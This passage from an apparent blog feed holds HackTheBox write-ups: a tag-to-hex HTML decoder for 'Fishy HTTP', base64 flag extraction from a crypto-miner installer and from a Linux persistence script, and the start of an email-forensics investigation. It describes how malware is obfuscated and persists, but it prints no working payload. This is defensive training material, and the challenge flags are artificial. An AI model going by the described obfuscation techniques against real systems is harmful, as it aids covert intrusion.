class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>Step 10: Use the Information from dotPeek to Decode the HTML</strong></p><ul><li><p>The analysis reveals that the binary uses specific tags that map to hexadecimal values. These tags are crucial for decoding the HTML data found in the PCAP file.</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!f5X9!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdbb3584e-84b0-4f73-b494-2f94abdba1b4_660x769.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!f5X9!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdbb3584e-84b0-4f73-b494-2f94abdba1b4_660x769.png 424w, https://substackcdn.com/image/fetch/$s_!f5X9!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdbb3584e-84b0-4f73-b494-2f94abdba1b4_660x769.png 848w, https://substackcdn.com/image/fetch/$s_!f5X9!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdbb3584e-84b0-4f73-b494-2f94abdba1b4_660x769.png 1272w, https://substackcdn.com/image/fetch/$s_!f5X9!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdbb3584e-84b0-4f73-b494-2f94abdba1b4_660x769.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!f5X9!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdbb3584e-84b0-4f73-b494-2f94abdba1b4_660x769.png" width="660" height="769" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/dbb3584e-84b0-4f73-b494-2f94abdba1b4_660x769.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:769,&quot;width&quot;:660,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!f5X9!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdbb3584e-84b0-4f73-b494-2f94abdba1b4_660x769.png 424w, https://substackcdn.com/image/fetch/$s_!f5X9!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdbb3584e-84b0-4f73-b494-2f94abdba1b4_660x769.png 848w, https://substackcdn.com/image/fetch/$s_!f5X9!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdbb3584e-84b0-4f73-b494-2f94abdba1b4_660x769.png 1272w, https://substackcdn.com/image/fetch/$s_!f5X9!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fdbb3584e-84b0-4f73-b494-2f94abdba1b4_660x769.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>Step 11: Write a Python Program to Decode the HTML</strong></p><ul><li><p>Write a Python script to decode the HTML content based on the tag-to-hex mapping you found in <strong>dotPeek</strong>.</p></li></ul><p>import base64<br>import random<br>import re</p><p># Tag to hex mapping (same as the original C# program)<br>tag_hex = {<br> "cite": "0", "h1": "1", "p": "2", "a": "3", "img": "4", "ul": "5", "ol": "6",<br> "button": "7", "div": "8", "span": "9", "label": "a", "textarea": "b", "nav": "c",<br> "b": "d", "i": "e", "blockquote": "f"<br>}</p><p>def decode_html(input_file):<br> # Read the HTML content from the file<br> with open(input_file, 'r') as f:<br> html_content = f.read()</p><p># Function to decode the data from base64 string using tag_hex mapping<br> def decode_data(data):<br> # Find all the tags in the body content and replace them with the hex mapping<br> decoded_str = ""<br> <br> # Match opening tags and replace them with their corresponding hex values<br> matches = re.findall(r'&lt;(\w+)[\s&gt;]', data)<br> for match in matches:<br> if match in tag_hex:<br> decoded_str += tag_hex[match]<br> <br> # Print the hex string before converting to bytes<br> print("Hex String:", decoded_str)</p><p># Try converting the hex string into bytes and decode it to ASCII<br> try:<br> decoded_bytes = bytes.fromhex(decoded_str)<br> decoded_ascii = decoded_bytes.decode('ascii')<br> return decoded_bytes, decoded_ascii<br> except ValueError as e:<br> # Handle the error gracefully if invalid hex is encountered<br> return f"Error decoding hex: {str(e)}", None</p><p># Decode the HTML content using the decode_data function<br> decoded_bytes, decoded_html = decode_data(html_content)</p><p>return decoded_bytes, decoded_html</p><p># Take the file path as input from the user<br>input_file = input("Please enter the path to the HTML file: ")<br>decoded_bytes, decoded_html = decode_html(input_file)</p><p># Output the decoded bytes and ASCII<br>if decoded_html:<br> print("\nDecoded ASCII:")<br> print(decoded_html)<br>print("\nDecoded Bytes:")<br>print(decoded_bytes)</p><p><strong>Step 12: Run the Python Decoder</strong></p><ul><li><p>Save the HTML content to a file and run it through the Python decoder.</p></li><li><p>This should give you the first part of the flag.</p></li></ul><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!xQGg!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1172c3b7-dcaa-40ad-9bfd-9777bb7ae20f_611x211.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!xQGg!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1172c3b7-dcaa-40ad-9bfd-9777bb7ae20f_611x211.png 424w, https://substackcdn.com/image/fetch/$s_!xQGg!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1172c3b7-dcaa-40ad-9bfd-9777bb7ae20f_611x211.png 848w, https://substackcdn.com/image/fetch/$s_!xQGg!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1172c3b7-dcaa-40ad-9bfd-9777bb7ae20f_611x211.png 1272w, https://substackcdn.com/image/fetch/$s_!xQGg!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1172c3b7-dcaa-40ad-9bfd-9777bb7ae20f_611x211.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!xQGg!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1172c3b7-dcaa-40ad-9bfd-9777bb7ae20f_611x211.png" width="611" height="211" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/1172c3b7-dcaa-40ad-9bfd-9777bb7ae20f_611x211.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:211,&quot;width&quot;:611,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!xQGg!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1172c3b7-dcaa-40ad-9bfd-9777bb7ae20f_611x211.png 424w, https://substackcdn.com/image/fetch/$s_!xQGg!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1172c3b7-dcaa-40ad-9bfd-9777bb7ae20f_611x211.png 848w, https://substackcdn.com/image/fetch/$s_!xQGg!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1172c3b7-dcaa-40ad-9bfd-9777bb7ae20f_611x211.png 1272w, https://substackcdn.com/image/fetch/$s_!xQGg!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F1172c3b7-dcaa-40ad-9bfd-9777bb7ae20f_611x211.png 1456w" sizes="100vw" loading="lazy"></picture><div></div></div></a></figure></div><p><strong>Conclusion</strong></p><p>You should now have both parts of the flag after following these steps.</p><ul><li><p><strong>Second Part of the Flag</strong>: Extracted via base64 decoding.</p></li><li><p><strong>First Part of the Flag</strong>: Decoded from HTML using tag-to-hex mapping.</p></li></ul><p>Congratulations on completing the "Fishy HTTP" challenge!</p>]]></content:encoded></item><item><title><![CDATA[HackTheBox: Red Miners]]></title><description><![CDATA[Challenge]]></description><link>https://www.byteberzerker.com/p/hack-the-box-red-miners</link><guid isPermaLink="false">https://www.byteberzerker.com/p/hack-the-box-red-miners</guid><dc:creator><![CDATA[ByteBerzerker]]></dc:creator><pubDate>Tue, 14 Jan 2025 00:55:27 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!MCQM!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa2e3a4d6-3716-4982-95fe-200cfb21ffe7_1897x608.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>Challenge Description</strong></p><p>In the race for Vitalium on Mars, the villainous Board of Arodor resorted to desperate measures, needing funds for their mining attempts. They devised a botnet specifically crafted to mine cryptocurrency covertly. A sample of Arodor's miner's installer was discovered on our server. Recognizing the gravity of the situation, a thorough investigation was launched to unravel the inner workings of the installation mechanism. This discovery served as a turning point, revealing the extent of Arodor's desperation. However, the battle for Vitalium continued, urging the team to remain vigilant and enhance cyber defenses.</p><p><strong>Steps to Solve the Challenge</strong></p><p><strong>1. Download the Files</strong></p><ul><li><p>The first step involved downloading the provided challenge files.</p></li></ul><p><strong>2. Unzip the Files</strong></p><ul><li><p>After downloading, the files were extracted using the unzip command.</p></li></ul><p>unzip challenge_files.zip</p><p><strong>3. Analyzing the miner_installer.sh Script</strong></p><ul><li><p>A file command was used to determine the type of the miner_installer.sh file.</p></li></ul><p>file miner_installer.sh</p><ul><li><p>The output indicated that it was a shell script.</p></li></ul><p><strong>4. Extracting Contents Using strings or cat</strong></p><ul><li><p>To reveal the contents of the shell script, the following command was used:</p></li></ul><p>strings miner_installer.sh</p><ul><li><p>Alternatively:</p></li></ul><p>cat miner_installer.sh</p><ul><li><p>Upon inspection, the script contained several encoded strings and sections related to the installation and obfuscation mechanism.</p></li></ul><p><strong>5. Identifying Points of Interest</strong></p><ul><li><p>The script was fairly lengthy and contained several encoded or encrypted components.</p></li><li><p>Noteworthy points included:</p><ul><li><p><strong>Indicators of Compromise (IoCs)</strong> such as file paths, URLs, and potential registry keys.</p></li><li><p><strong>Base64 encoded strings</strong>, likely containing instructions or parts of the flag.</p></li></ul></li></ul><p><strong>6. Base64 Encoded Strings</strong></p><ul><li><p>Several Base64 encoded strings were extracted from the script, including:</p><ul><li><p>c6FydDE9IkhUQnttMW4xbmNcCg==</p></li><li><p>c6FydDI9I190aD3lc93NHkicg==</p></li><li><p>X3QwK200cnM=</p></li><li><p>ZXhwb3J0IHBhcnQ9PSJfdGgzX3IzZF9wbDRuM3R9Ig==</p></li></ul></li></ul><p><strong>7. Decoding the Strings with CyberChef</strong></p><ul><li><p>Each Base64 string was decoded using <strong>CyberChef</strong>:</p><ol><li><p>Open <strong>CyberChef</strong> and paste the Base64 string in the input section.</p></li><li><p>Select the From Base64 operation.</p></li><li><p>Decode the string to obtain its plaintext value.</p></li></ol></li></ul><p><strong>8. Assembling the Flag</strong></p><p>Reconstruct the decoded base64 to get the flag, put in logical order.</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!MCQM!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa2e3a4d6-3716-4982-95fe-200cfb21ffe7_1897x608.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!MCQM!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa2e3a4d6-3716-4982-95fe-200cfb21ffe7_1897x608.png 424w, https://substackcdn.com/image/fetch/$s_!MCQM!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa2e3a4d6-3716-4982-95fe-200cfb21ffe7_1897x608.png 848w, https://substackcdn.com/image/fetch/$s_!MCQM!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa2e3a4d6-3716-4982-95fe-200cfb21ffe7_1897x608.png 1272w, https://substackcdn.com/image/fetch/$s_!MCQM!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa2e3a4d6-3716-4982-95fe-200cfb21ffe7_1897x608.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!MCQM!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa2e3a4d6-3716-4982-95fe-200cfb21ffe7_1897x608.png" width="1456" height="467" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/a2e3a4d6-3716-4982-95fe-200cfb21ffe7_1897x608.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:467,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!MCQM!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa2e3a4d6-3716-4982-95fe-200cfb21ffe7_1897x608.png 424w, https://substackcdn.com/image/fetch/$s_!MCQM!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa2e3a4d6-3716-4982-95fe-200cfb21ffe7_1897x608.png 848w, https://substackcdn.com/image/fetch/$s_!MCQM!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa2e3a4d6-3716-4982-95fe-200cfb21ffe7_1897x608.png 1272w, https://substackcdn.com/image/fetch/$s_!MCQM!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fa2e3a4d6-3716-4982-95fe-200cfb21ffe7_1897x608.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p><strong>Conclusion</strong></p><p>The challenge demonstrated how malicious actors can obfuscate installation mechanisms to perform cryptocurrency mining covertly. By carefully dissecting the script, identifying encoded strings, and using tools like CyberChef to decode the strings, the entire flag was successfully retrieved. Additionally, this challenge emphasized the importance of identifying Indicators of Compromise (IoCs) to enhance network defenses.</p>]]></content:encoded></item><item><title><![CDATA[HackTheBox: Extraterrestrial Persistence]]></title><description><![CDATA[Challenge]]></description><link>https://www.byteberzerker.com/p/hack-the-box-extraterrestrial-persistence</link><guid isPermaLink="false">https://www.byteberzerker.com/p/hack-the-box-extraterrestrial-persistence</guid><dc:creator><![CDATA[ByteBerzerker]]></dc:creator><pubDate>Tue, 14 Jan 2025 00:54:00 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!SaKV!,w_256,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F5be7fb19-3857-4c95-818e-5eb12cdc00b3_600x600.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>Challenge Description:</strong></p><p>There is a rumor that aliens have developed a persistence mechanism that is difficult to detect. After investigating her compromised Linux server, Pandora found a possible sample of this mechanism. The objective is to analyze the provided files and discover how persistence is installed, ultimately revealing the flag.</p><p><strong>Steps to Solve:</strong></p><ol><li><p><strong>Download and Extract Files:</strong></p><ul><li><p><strong>Start by downloading the provided challenge files and extract the contents.</strong></p></li></ul></li><li><p><strong>Analyze the File:</strong></p><ul><li><p><strong>Open a terminal and navigate to the directory where the file persistence.sh resides.</strong></p></li><li><p><strong>Run the following command: <br>file persistence.sh</strong></p><ul><li><p><strong>This command will identify the type of file. The result should indicate that it is a shell script.</strong></p></li></ul></li></ul></li><li><p><strong>Read the File Contents:</strong></p><ul><li><p><strong>Use cat or strings to print the contents of the script to the terminal: <br>cat persistence.sh<br><br>or <br>strings persistence.sh</strong></p></li><li><p><strong>Note the base64-encoded data present within the script.</strong></p></li></ul></li><li><p><strong>Extract and Copy the Base64 Data:</strong></p><ul><li><p><strong>Identify the base64-encoded string. This string is typically large and encoded to hide the actual payload.</strong></p></li><li><p><strong>Copy the entire base64 string.</strong></p></li></ul></li><li><p><strong>Decode the Base64 Data in CyberChef:</strong></p><ul><li><p><strong>Open <a href="https://gchq.github.io/CyberChef/">CyberChef</a> in your browser.</strong></p></li><li><p><strong>Select the operation "From Base64."</strong></p></li><li><p><strong>Paste the copied base64 data into the input section.</strong></p></li><li><p><strong>Ensure "Remove non-alphabet chars" is checked (to clean up any formatting).</strong></p></li><li><p><strong>Run the operation by clicking the "Bake!" button.</strong></p></li></ul></li><li><p><strong>Review the Decoded Output:</strong></p><ul><li><p><strong>The output of the decoded base64 data should reveal the contents, which may contain important information such as:</strong></p><ul><li><p><strong>The persistence mechanism (e.g., a backdoor command, cron job, or system service).</strong></p></li><li><p><strong>The flag for the challenge.</strong></p></li></ul></li></ul></li></ol><div class="captioned-image-container"><figure><a class="image-link image2" target="_blank" href="https://substackcdn.com/image/fetch/$s_!BGSK!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbae4622a-098e-4737-887c-28b47866c77f_2555x408.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!BGSK!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbae4622a-098e-4737-887c-28b47866c77f_2555x408.png 424w, https://substackcdn.com/image/fetch/$s_!BGSK!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbae4622a-098e-4737-887c-28b47866c77f_2555x408.png 848w, https://substackcdn.com/image/fetch/$s_!BGSK!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbae4622a-098e-4737-887c-28b47866c77f_2555x408.png 1272w, https://substackcdn.com/image/fetch/$s_!BGSK!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbae4622a-098e-4737-887c-28b47866c77f_2555x408.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!BGSK!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbae4622a-098e-4737-887c-28b47866c77f_2555x408.png" width="1456" height="233" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/bae4622a-098e-4737-887c-28b47866c77f_2555x408.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:233,&quot;width&quot;:1456,&quot;resizeWidth&quot;:null,&quot;bytes&quot;:null,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:null,&quot;href&quot;:null,&quot;belowTheFold&quot;:false,&quot;topImage&quot;:true,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!BGSK!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbae4622a-098e-4737-887c-28b47866c77f_2555x408.png 424w, https://substackcdn.com/image/fetch/$s_!BGSK!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbae4622a-098e-4737-887c-28b47866c77f_2555x408.png 848w, https://substackcdn.com/image/fetch/$s_!BGSK!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbae4622a-098e-4737-887c-28b47866c77f_2555x408.png 1272w, https://substackcdn.com/image/fetch/$s_!BGSK!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fbae4622a-098e-4737-887c-28b47866c77f_2555x408.png 1456w" sizes="100vw" fetchpriority="high"></picture><div></div></div></a></figure></div><p><strong>Expected Result:</strong></p><p>The decoded output in CyberChef should display the flag in plain text, confirming the solution.</p><p><strong>Command Reference:</strong></p><p># Step 1: Verify the file type<br>file persistence.sh</p><p># Step 2: Print contents of the file<br>cat persistence.sh</p><p># Step 3: Decode using CyberChef (copy the base64 string)</p><p>This systematic approach ensures that you decode and understand how the persistence mechanism works while obtaining the challenge flag.</p>]]></content:encoded></item><item><title><![CDATA[HackTheBox: Heartbreaker]]></title><description><![CDATA[Sherlock]]></description><link>https://www.byteberzerker.com/p/hack-the-box-heartbreaker</link><guid isPermaLink="false">https://www.byteberzerker.com/p/hack-the-box-heartbreaker</guid><dc:creator><![CDATA[ByteBerzerker]]></dc:creator><pubDate>Sat, 11 Jan 2025 02:30:18 GMT</pubDate><enclosure url="https://substackcdn.com/image/fetch/$s_!quu5!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fca157180-7e98-4431-ba4d-43c552d134ea_1580x537.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p><strong>Sherlock Scenario</strong></p><p><strong>Situation:</strong> The customer has been alerted about concerning reports indicating a potential breach of their database, with information allegedly circulating on the darknet market. As the Incident Responder, the task is to conduct an investigation into an email received by an employee, comprehend its implications, and uncover connections to the data breach. The focus is to examine the provided artifacts to identify significant events on the victim's workstation.</p><p>Note: The first thing that I like to do when I get these KAPE target outputs is to run it through a KAPE module such as !EZParser using the command: ./kape.exe --msource "C:\Users\Username\Desktop\wb-ws-01" --module !EZParser --mdest "C:\Users\Username\Desktop\KOUT\" . This will be useful to us in the future as we continue working through the tasks.</p><p><strong>1. The victim received an email from an unidentified sender. What email address was used for the suspicious email?</strong></p><p><strong>Method:</strong> The investigation starts by identifying the Outlook <strong>.ost</strong> file:</p><ul><li><p><strong>Location:</strong> <br>C:\Users\Username\Desktop\wb-ws-01\C\Users\ash.williams\AppData\Local\Microsoft\Outlook</p></li><li><p><strong>Tool Used:</strong> PSTWalker</p></li><li><p><strong>Steps:</strong></p><ul><li><p>Open the <strong>.ost</strong> file in PSTWalker.</p></li><li><p>Navigate to the <strong>Inbox</strong> folder and identify the suspicious email.</p></li></ul></li></ul><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" 